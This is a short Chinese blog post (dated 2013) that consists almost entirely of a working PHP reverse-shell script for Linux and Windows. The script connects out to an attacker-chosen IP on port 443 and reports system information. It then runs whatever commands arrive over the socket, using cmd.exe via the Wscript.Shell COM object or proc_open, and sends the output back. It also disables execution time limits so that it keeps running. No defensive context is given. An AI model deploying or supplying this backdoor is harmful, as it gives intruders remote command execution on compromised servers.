PHP反弹脚本 Linux/Windows两用

2013/07/11 15:03
阅读数 1K
<?php
    error_reporting (E_ERROR);
    ignore_user_abort(true);
    ini_set('max_execution_time',0);
    $ipaddr = 'xxx.xxx.xxx.xxx';
    $port = '443';
    $msg = php_uname()."\n------------Code by Spider-------------\n";
    $cwd = getcwd();
     
    function procopen($cmd,$env,$sock) {
    global $cwd;
    $descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));
    $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
    if (is_resource($process)) {
    fwrite($pipes[0],$cmd);
    fclose($pipes[0]);
    $msg = stream_get_contents($pipes[1]);
    fwrite($sock,$msg);
    fclose($pipes[1]);
    $msg = stream_get_contents($pipes[2]);
    fwrite($sock,$msg);
    fclose($pipes[2]);
    proc_close($process);
    }
    return true;
    }
     
    function command($cmd,$sock) {
    if(substr(PHP_OS,0,3) == 'WIN') {
    $wscript = new COM("Wscript.Shell");
    if($wscript && (!stristr(get_cfg_var("disable_classes"),'COM'))) {
    $exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c '.$cmd); //自定义CMD路径
    $stdout = $exec->StdOut();
    $stroutput = $stdout->ReadAll();
    fwrite($sock,$stroutput);
    } else {
    $env = array('path' => 'c:\\windows\\system32');
    procopen($cmd,$env,$sock);
    }
    } else {
    $env = array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
    procopen($cmd,$env,$sock);
    }
    return true;
    }
     
    $sock = fsockopen($ipaddr,$port);
    fwrite($sock,$msg);
    while ($cmd = fread($sock,1024)) {
    if (substr($cmd,0,3) == 'cd ') {
    $cwd = trim(substr($cmd,3,-1));
    chdir($cwd);
    $cwd = getcwd();
    }
    if (trim(strtolower($cmd)) == 'exit') {
    echo 'logout!';
    break;
    } else {
    command($cmd,$sock);
    }
    }
    fclose($sock);
    ?>

展开阅读全文
打赏
0
1 收藏
分享
加载中
更多评论
打赏
0 评论
1 收藏
0
分享
返回顶部
顶部